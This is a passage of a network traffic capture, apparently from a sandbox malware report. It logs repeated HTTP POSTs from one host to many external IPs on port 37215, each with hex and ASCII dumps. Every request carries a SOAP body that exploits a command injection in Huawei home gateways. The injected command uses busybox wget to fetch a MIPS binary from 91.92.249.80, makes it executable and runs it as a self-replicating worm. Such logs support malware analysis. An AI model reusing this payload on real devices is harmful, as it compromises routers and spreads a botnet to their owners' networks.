                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          720192.168.2.2336454197.94.44.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.223459959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          721192.168.2.233583441.151.114.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.223462105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          722192.168.2.2343838143.214.200.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.223478079 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          723192.168.2.2360800197.104.22.23137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.223834038 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          724192.168.2.234504241.66.172.7837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224265099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          725192.168.2.2333598157.90.56.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224308968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          726192.168.2.2340134170.248.17.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224868059 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          727192.168.2.2352636197.98.150.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224886894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          728192.168.2.235919641.78.194.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224888086 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          729192.168.2.2343060197.71.175.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224971056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
